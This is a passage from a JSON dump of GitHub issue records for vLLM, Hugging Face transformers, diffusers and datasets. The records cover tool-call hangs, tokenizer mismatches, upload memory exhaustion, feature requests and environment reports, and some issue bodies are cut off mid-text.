issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30023", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-04T03:40:26Z", "updated_at": "2025-12-18T05:31:57Z", "comments": 0, "user": "zeerd" }, { "repo": "vllm-project/vllm", "number": 29998, "title": "[Bug]: cannot send two POST to /v1/chat/completions endpoint with identic tool function name with model GPT-OSS-120B", "body": "### Your current environment\n\n
\nThe bug is reproducible with docker image vllm/vllm-openai:v0.12.0\n\n```yaml\nservices:\n vllm-gptoss-large:\n image: vllm/vllm-openai:v0.12.0\n restart: always\n shm_size: '64gb'\n deploy:\n resources:\n reservations:\n devices:\n - driver: nvidia\n device_ids: ['0', '1']\n capabilities: [gpu]\n volumes:\n - ./data/hf:/data\n environment:\n - HF_TOKEN=${HF_TOKEN}\n ports:\n - 8000:8000\n command: [\"openai/gpt-oss-120b\",\n \"--tool-call-parser\",\"openai\",\n \"--enable-auto-tool-choice\",\n \"--reasoning-parser\",\"openai_gptoss\",\n \"--tensor-parallel-size\",\"2\",\n \"--port\",\"8000\",\n \"--api-key\", \"${VLLM_API_KEY}\",\n \"--download_dir\", \"/data\"]\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nThis bash script cannot be executed a second time, unless the name of the function is changed to a value which was not yet sent. Without tool definition, the POST can be sent as often as you like.\n\n```bash\n#!/bin/bash\ncurl -X POST http://localhost:8000/v1/chat/completions \\\n -H \"Authorization: Bearer ${VLLM_API_KEY}\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"model\": \"openai/gpt-oss-120b\",\n \"stream\": false,\n \"messages\": [\n {\n \"role\": \"system\",\n \"content\": \"Be a helpful assistant.\"\n },\n {\n \"role\": \"user\",\n \"content\": \"Hi\"\n },\n {\n \"role\": \"assistant\",\n \"content\": \"How can I help you?\"\n },\n {\n \"role\": \"user\",\n \"content\": \"Do you like Monty Python?\"\n }\n ],\n \"tools\": [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"CHANGE-NAME-BEFORE-SENDING\",\n \"description\": \"Use this tool if you need to extract information from a website.\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"url\": {\n \"type\": \"string\",\n \"description\": \"The URL to search or extract information from.\"\n }\n },\n \"required\": [\"url\"]\n }\n }\n }\n ]\n }'\n\n```\n\nThe script doesn't finish waiting for a response and `nvidia-smi` shows the cards consuming max power. The vllm logs show that there are tokens generated, so from an external point of view the LLM seems to generate tokens without stopping.\n\n\"Image\"\n\nThis is quite weird, because when you call it with python SDK, it is working fine, e.g.\n\n```python\nfrom openai import OpenAI\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\nclient = OpenAI(\n api_key=os.getenv(\"API_KEY\"),\n base_url=\"http://localhost:8000/v1\",\n)\n\ntools = [{\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_weather\",\n \"description\": \"Get the current weather in a given location\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"location\": {\"type\": \"string\"},\n \"description\": \"Location and state, e.g., 'San Francisco, CA'\"\n },\n \"required\": [\"location\"]\n },\n },\n }\n]\n\nresponse = client.chat.completions.create(\n model=\"openai/gpt-oss-120b\",\n messages=[{\"role\": \"user\", \"content\": \"How is the weather in Berlin? use the tool get_weather.\"}],\n tools=tools,\n tool_choice=\"auto\",\n stream=False \n)\n \nprint(response.choices[0].message)\n```\n\nIn fact this can also be reproduced using n8n, AI Agent nodes which are based on the typescipt langgraph implementation: https://github.com/n8n-io/n8n/blob/master/packages/%40n8n/nodes-langchain/nodes/agents/Agent/agents/ToolsAgent/V1/execute.ts#L34\n\nHere you can also see that chat windows freeze when a tool is attached and a user is asking the second question.\n\nThe bug really seems to be related to this model, because I tested Mistral and Qwen Models and I couldn't reproduce it. When I tried to debug the issue, there was a sensetivity to the description field in the parameters list of the tool. To make it clear, this can also only be sent once using the OpenAI Python SDK, but works again when the function name is changed:\n\n```python\nfrom openai import OpenAI\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\nclient = OpenAI(\n api_key=os.getenv(\"API_KEY\"),\n base_url=f\"https://{os.getenv('API_DOMAIN')}/v1\",\n)\n\ntools = [{\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_weather\",\n \"description\": \"Get the current weather in a given location\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"location\": {\n \"type\": \"string\", \n \"description\": \"Location and state, e.g., 'San Francisco, CA'\"\n },\n },\n \"required\": [\"locatio", "url": "https://github.com/vllm-project/vllm/issues/29998", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-03T21:41:35Z", "updated_at": "2025-12-19T15:53:43Z", "comments": 14, "user": "pd-t" }, { "repo": "huggingface/transformers", "number": 42589, "title": "Incorrect tokenization `tokenizers` for escaped strings / Mismatch with `mistral_common`", "body": "### System Info\n\n```\nIn [3]: mistral_common.__version__\nOut[3]: '1.8.6'\n```\n\n```\nIn [4]: import transformers; transformers.__version__\nOut[4]: '5.0.0.dev0'\n```\n\n```\nIn [5]: import tokenizers; tokenizers.__version__\nOut[5]: '0.22.1'\n```\n\n### Who can help?\n\n@ArthurZucker @itazap \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```py\nfrom transformers import AutoTokenizer\nfrom mistral_common.tokens.tokenizers.mistral import MistralTokenizer\nfrom mistral_common.protocol.instruct.request import ChatCompletionRequest\n\nreq = ChatCompletionRequest(messages=[\n {'role': 'system', 'content': ''},\n {'role': 'user', 'content': 'hey'},\n {'role': 'assistant', 'content': 'ju\\x16'},\n {'role': 'user', 'content': 'hey'},\n])\n\ntokenizer_orig = MistralTokenizer.from_hf_hub(\"mistralai/Ministral-3-3B-Instruct-2512\")\ntokenizer_hf = AutoTokenizer.from_pretrained(\"mistralai/Ministral-3-3B-Instruct-2512\")\n\norig_tokens = tokenizer_orig.encode_chat_completion(req).tokens\norig_text = tokenizer_orig.encode_chat_completion(req).text\n\nprint(\"Expected\")\nprint(orig_text)\nprint(orig_tokens)\n\nhf_tokens = tokenizer_hf.apply_chat_template(req.to_openai()[\"messages\"])\nhf_text = tokenizer_hf.convert_ids_to_tokens(hf_tokens)\n\nprint(\"HF\")\nprint(hf_tokens)\nprint(hf_text)\n```\n\ngives:\n\n```\nExpected\n[SYSTEM_PROMPT][/SYSTEM_PROMPT][INST]hey[/INST]ju[INST]hey[/INST]\n[1, 17, 18, 3, 74058, 4, 5517, 1022, 2, 3, 74058, 4]\nHF\n[1, 17, 18, 3, 74058, 4, 5517, 1022, 1032, 2, 3, 74058, 4]\n['', '[SYSTEM_PROMPT]', '[/SYSTEM_PROMPT]', '[INST]', 'hey', '[/INST]', 'ju', '\u0116', '\u0120', '', '[INST]', 'hey', '[/INST]']\n```\n\nAs you can see the token `1032` should not be there. I'm not sure exactly what is happening and it could very well be that the behavior of `tokenizers` makes sense here. \n\n**However**, this is a mismatch with `mistral_common` which means that any such tokenization will give slightly different token ids leading to slightly incorrect results since all Mistral models are trained with `mistral_common`.\n\nThis is especially important for \"long-log\" parsing tasks that often have escaped strings.\n\nIt's def an edge case, but would still be very nice to fix.\n\n### Expected behavior\n\nAlign encoding.", "url": "https://github.com/huggingface/transformers/issues/42589", "state": "closed", "labels": [ "bug" ], "created_at": "2025-12-03T10:57:35Z", "updated_at": "2025-12-16T10:45:35Z", "comments": 5, "user": "patrickvonplaten" }, { "repo": "huggingface/diffusers", "number": 12781, "title": "Impossible to log into Huggingface/Diffusers Discord", "body": "### Describe the bug\n\nWhen trying to verify my Discord/Huggingface account, no matter what I do, I end up with this message: \n\"Image\"\n\nHas the HF Discord died? If that is the case, what alternatives are there? \n\nI feel that there is a strong need for some kind of forum where users of Diffusers in collaboration can figure out how to make newly supported and huge models run on consumer hardware. The Diffusers discussion on GitHub is dead. So, where do we go?\n\n### Reproduction\n\nTry to log-in in to Discord. \n\n### Logs\n\n```shell\n-\n```\n\n### System Info\n\n-\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12781", "state": "closed", "labels": [ "bug" ], "created_at": "2025-12-03T09:42:55Z", "updated_at": "2025-12-04T15:11:42Z", "comments": 4, "user": "tin2tin" }, { "repo": "vllm-project/vllm", "number": 29944, "title": "[Usage]:It seems that the prefix cache has not brought about any performance benefits.", "body": "### Your current environment\n\n```\nroot@ubuntu:/vllm-workspace# python3 collect_env.py\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 4.1.0\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 (main, Jun 4 2025, 08:56:18) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-5.15.0-25-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration :\nGPU 0: NVIDIA H20\nGPU 1: NVIDIA H20\nGPU 2: NVIDIA H20\nGPU 3: NVIDIA H20\nGPU 4: NVIDIA H20\nGPU 5: NVIDIA H20\nGPU 6: NVIDIA H20\nGPU 7: NVIDIA H20\n\nNvidia driver version : 550.127.08\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 224\nOn-line CPU(s) list: 0-223\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Platinum 8480+\nCPU family: 6\nModel: 143\nThread(s) per core: 2\nCore(s) per socket: 56\nSocket(s): 2\nStepping: 8\nFrequency boost: enabled\nCPU max MHz: 2001.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4000.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr avx512_fp16 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 5.3 MiB (112 instances)\nL1i cache: 3.5 MiB (112 instances)\nL2 cache: 224 MiB (112 instances)\nL3 cache: 210 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-55,112-167\nNUMA node1 CPU(s): 56-111,168-223\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced IBRS, IBPB conditional, RSB filling\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.3.1\n[pip3] numpy==2.2.6\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cudnn-frontend==1.14.1\n[pip3] nvidia-cufft-cu12==11.3.3.83\n[pip3] nvidia-cufile-cu", "url": "https://github.com/vllm-project/vllm/issues/29944", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-03T07:03:49Z", "updated_at": "2025-12-03T07:04:37Z", "comments": 0, "user": "wenba0" }, { "repo": "vllm-project/vllm", "number": 29940, "title": "[Usage]: QWen2-Audio-7B support", "body": "### Your current environment\n\nWe encountered numerous peculiar issues during the QWen2-Audio-7B conversion process. Do we currently support Qwen2-Audio-7B? If so, could you provide a demo?\n\nThank you very much\uff01\n\n### \ud83d\udc1b Describe the bug\n\nRefer to Whisper's demo\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29940", "state": "closed", "labels": [ "usage" ], "created_at": "2025-12-03T06:04:07Z", "updated_at": "2025-12-04T14:23:05Z", "comments": 1, "user": "freedom-cui" }, { "repo": "huggingface/datasets", "number": 7893, "title": "push_to_hub OOM: _push_parquet_shards_to_hub accumulates all shard bytes in memory", "body": "## Summary\n\nLarge dataset uploads crash or hang due to memory exhaustion. This appears to be the root cause of several long-standing issues.\n\n### Related Issues\n\nThis is the root cause of:\n- #5990 - Pushing a large dataset on the hub consistently hangs (46 comments, open since 2023)\n- #7400 - 504 Gateway Timeout when uploading large dataset\n- #6686 - Question: Is there any way for uploading a large image dataset?\n\n### Context\n\nDiscovered while uploading the [Aphasia Recovery Cohort (ARC)](https://openneuro.org/datasets/ds004884) neuroimaging dataset (~270GB, 902 sessions) to HuggingFace Hub using the `Nifti()` feature.\n\nWorking implementation with workaround: [arc-aphasia-bids](https://github.com/The-Obstacle-Is-The-Way/arc-aphasia-bids)\n\n## Root Cause\n\nIn `_push_parquet_shards_to_hub` (arrow_dataset.py), the `additions` list accumulates every `CommitOperationAdd` with full Parquet bytes in memory:\n\n```python\nadditions = []\nfor shard in shards:\n parquet_content = shard.to_parquet_bytes() # ~300 MB per shard\n shard_addition = CommitOperationAdd(path_or_fileobj=parquet_content)\n api.preupload_lfs_files(additions=[shard_addition])\n additions.append(shard_addition) # THE BUG: bytes stay in memory forever\n```\n\nFor a 902-shard dataset: **902 \u00d7 300 MB = ~270 GB RAM requested \u2192 OOM/hang**.\n\nThe bytes are held until the final `create_commit()` call, preventing garbage collection.\n\n## Reproduction\n\n```python\nfrom datasets import load_dataset\n\n# Any large dataset with embedded files (Image, Audio, Nifti, etc.)\nds = load_dataset(\"imagefolder\", data_dir=\"path/to/large/dataset\")\nds.push_to_hub(\"repo-id\", num_shards=500) # Watch memory grow until crash\n```\n\n## Workaround\n\nProcess one shard at a time, upload via `HfApi.upload_file(path=...)`, delete before next iteration:\n\n```python\nfrom huggingface_hub import HfApi\nimport pyarrow.parquet as pq\n\napi = HfApi()\nfor i in range(num_shards):\n shard = ds.shard(num_shards=num_shards, index=i, contiguous=True)\n \n # Write to disk, not memory\n shard.to_parquet(local_path)\n \n # Upload from file path (streams from disk)\n api.upload_file(\n path_or_fileobj=str(local_path),\n path_in_repo=f\"data/train-{i:05d}-of-{num_shards:05d}.parquet\",\n repo_id=repo_id,\n repo_type=\"dataset\",\n )\n \n # Clean up before next iteration\n local_path.unlink()\n del shard\n```\n\nMemory usage stays constant (~1-2 GB) instead of growing linearly.\n\n## Suggested Fix\n\nAfter `preupload_lfs_files` succeeds for each shard, release the bytes:\n\n1. Clear `path_or_fileobj` from the `CommitOperationAdd` after preupload\n2. Or write to temp file and pass file path instead of bytes\n3. Or commit incrementally instead of batching all additions\n\n## Environment\n\n- datasets version: main branch (post-0.22.0)\n- Platform: macOS 14.x ARM64\n- Python: 3.13\n- PyArrow: 18.1.0\n- Dataset: 902 shards, ~270 GB total embedded NIfTI files", "url": "https://github.com/huggingface/datasets/issues/7893", "state": "closed", "labels": [], "created_at": "2025-12-03T04:19:34Z", "updated_at": "2025-12-05T22:45:59Z", "comments": 2, "user": "The-Obstacle-Is-The-Way" }, { "repo": "vllm-project/vllm", "number": 29920, "title": "[Feature]: Add support for fused fp8 output to FlashAttention 3", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nOn Hopper, we use FlashAttention as the default attention backend. When o-proj is quantized to fp8, we are leaving performance on the table as FA3 does not support fused output fp8 quant. With Triton/ROCm/AITER backends we saw up to 8% speedups with attention+quant fusion.\n\nvLLM already maintains our own fork of FA, adding output quant support should be pretty non-intrusive. Subtasks:\n- vllm-flash-attn:\n - add `output_scale` parameter to attention forward functions\n - plumb parameter through all layers of the interface\n - compare branching at runtime/compile-time for performance and binary size (Hopper)\n\n- vllm:\n - integrate new FA version\n - add support for attention+quant fusion to FA attention backend\n - check FA version, hardware version\n - should be as easy as modifying the `supports_fused_output_quant` method and plumbing `output_scale` from `FlashAttentionImpl.forward()` to the kernel call\n\n### Additional context\n\ncc @LucasWilkinson \n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29920", "state": "open", "labels": [ "help wanted", "performance", "feature request", "torch.compile" ], "created_at": "2025-12-02T20:16:31Z", "updated_at": "2026-01-05T20:53:11Z", "comments": 4, "user": "ProExpertProg" }, { "repo": "vllm-project/vllm", "number": 29917, "title": "[Feature]: VLLM_DISABLE_COMPILE_CACHE should be a config flag", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\n`vllm serve` does a nice printout of non-default config flags. VLLM_DISABLE_COMPILE_CACHE gets used enough that it should have an equivalent config flag for it\n\nOffline @ProExpertProg mentioned we can treat it like VLLM_DEBUG_DUMP_PATH where we have both and the env var overrides the config option by overwriting it directly\n\n### Alternatives\n\nnone\n\n### Additional context\n\nn/a\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29917", "state": "open", "labels": [ "help wanted", "feature request", "torch.compile" ], "created_at": "2025-12-02T20:06:01Z", "updated_at": "2025-12-05T05:19:12Z", "comments": 6, "user": "zou3519" }, { "repo": "huggingface/inference-playground", "number": 102, "title": "How to know when a model is outdated ?", "body": "I'm testing https://huggingface.co/chat/models/openai/gpt-oss-20b and there I asked this:\n```\ndo you know any github repository created in 2025?\n\n

Sure! Here are a few GitHub repositories that were created in\u202f2025 (all with their public \u201ccreated\u202fdate\u201d and a short description):

\n\nRepository | Created | Short description | Link\n\nopen\u2011thoughts/open\u2011thoughts | 2025\u201101\u201127 | An open\u2011source platform for curating datasets that can be used to train and evaluate reasoning\u2011oriented language models. | https://github.com/open-thoughts/open-thoughts\n\u00a0...\n```\nBut on https://huggingface.co/playground:\n```\ndo you know any github repository created in 2025?\n\nI don\u2019t have any information about repositories that were created in 2025. My training data only goes up to September\u202f2023, so I can\u2019t see or reference anything that was added to GitHub after that date. If you\u2019re looking for recent projects, you could search GitHub directly or use the GitHub API to filter repositories by creation date.\n```\nI'm asking it here because I don't know where else to ask, I also opened an issue here https://github.com/ggml-org/llama.cpp/discussions/15396#discussioncomment-15136920 .\n\nI've also downloaded the https://huggingface.co/openai/gpt-oss-20b and running locally it doesn't know anything from 2025.\n\n**Based on this I suspect that the model running here https://huggingface.co/chat/models/openai/gpt-oss-20b is not the one that's here https://huggingface.co/openai/gpt-oss-20b .**\n\n**How/Where can we get the version running here https://huggingface.co/chat/models/openai/gpt-oss-20b ?**", "url": "https://github.com/huggingface/inference-playground/issues/102", "state": "open", "labels": [], "created_at": "2025-12-02T17:10:51Z", "updated_at": "2025-12-02T17:10:51Z", "user": "mingodad" }, { "repo": "vllm-project/vllm", "number": 29875, "title": "[Usage]: Is there a way to inject the grammar into the docker directly", "body": "### Your current environment\n\n```text\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 3.28.0\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.19 | packaged by conda-forge | (main, Oct 22 2025, 22:29:10) [GCC 14.3.0] (64-bit runtime)\nPython platform : Linux-6.8.0-1030-azure-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : Could not collect\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : GPU 0: NVIDIA H100 NVL\nNvidia driver version : 535.247.01\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.10.2\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 48 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 40\nOn-line CPU(s) list: 0-39\nVendor ID: AuthenticAMD\nModel name: AMD EPYC 9V84 96-Core Processor\nCPU family: 25\nModel: 17\nThread(s) per core: 1\nCore(s) per socket: 40\nSocket(s): 1\nStepping: 1\nBogoMIPS: 4800.05\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid aperfmperf tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm cmp_legacy cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw topoext perfctr_core vmmcall fsgsbase bmi1 avx2 smep bmi2 erms invpcid avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves user_shstk avx512_bf16 clzero xsaveerptr rdpru arat avx512vbmi umip avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq rdpid fsrm\nHypervisor vendor: Microsoft\nVirtualization type: full\nL1d cache: 1.3 MiB (40 instances)\nL1i cache: 1.3 MiB (40 instances)\nL2 cache: 40 MiB (40 instances)\nL3 cache: 160 MiB (5 instances)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-39\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Vulnerable: Safe RET, no microcode\nVulnerability Spec store bypass: Vulnerable\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Retpolines; STIBP disabled; RSB filling; PBRSB-eIBRS Not affected; BHI Not affected\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.5.2\n[pip3] numpy==1.26.4\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n", "url": "https://github.com/vllm-project/vllm/issues/29875", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-02T12:30:56Z", "updated_at": "2025-12-03T11:53:43Z", "comments": 1, "user": "chwundermsft" }, { "repo": "vllm-project/vllm", "number": 29871, "title": "[Usage]: Extremly low token input speed for DeepSeek-R1-Distill-Llama-70B", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (GCC) 14.2.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.4 (main, Aug 29 2025, 09:21:27) [GCC 14.2.0] (64-bit runtime)\nPython platform : Linux-5.15.0-118-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.61\nCUDA_MODULE_LOADING set to :\nGPU models and configuration :\nGPU 0: NVIDIA H100 80GB HBM3\nGPU 1: NVIDIA H100 80GB HBM3\nGPU 2: NVIDIA H100 80GB HBM3\nGPU 3: NVIDIA H100 80GB HBM3\nGPU 4: NVIDIA H100 80GB HBM3\nGPU 5: NVIDIA H100 80GB HBM3\nGPU 6: NVIDIA H100 80GB HBM3\nGPU 7: NVIDIA H100 80GB HBM3\n\nNvidia driver version : 570.158.01\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0-191\nVendor ID: AuthenticAMD\nModel name: AMD EPYC 9654 96-Core Processor\nCPU family: 25\nModel: 17\nThread(s) per core: 1\nCore(s) per socket: 96\nSocket(s): 2\nStepping: 1\nFrequency boost: enabled\nCPU max MHz: 3707.8120\nCPU min MHz: 1500.0000\nBogoMIPS: 4793.01\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid aperfmperf rapl pni pclmulqdq monitor ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt tce topoext perfctr_core perfctr_nb bpext perfctr_llc mwaitx cpb cat_l3 cdp_l3 invpcid_single hw_pstate ssbd mba ibrs ibpb stibp ibrs_enhanced vmmcall fsgsbase bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local avx512_bf16 clzero irperf xsaveerptr rdpru wbnoinvd amd_ppin cppc arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold avic v_vmsave_vmload vgif v_spec_ctrl avx512vbmi umip pku ospke avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq la57 rdpid overflow_recov succor smca fsrm flush_l1d\nVirtualization: AMD-V\nL1d cache: 6 MiB (192 instances)\nL1i cache: 6 MiB (192 instances)\nL2 cache: 192 MiB (192 instances)\nL3 cache: 768 MiB (24 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-95\nNUMA node1 CPU(s): 96-191\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Mitigation; safe RET\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer 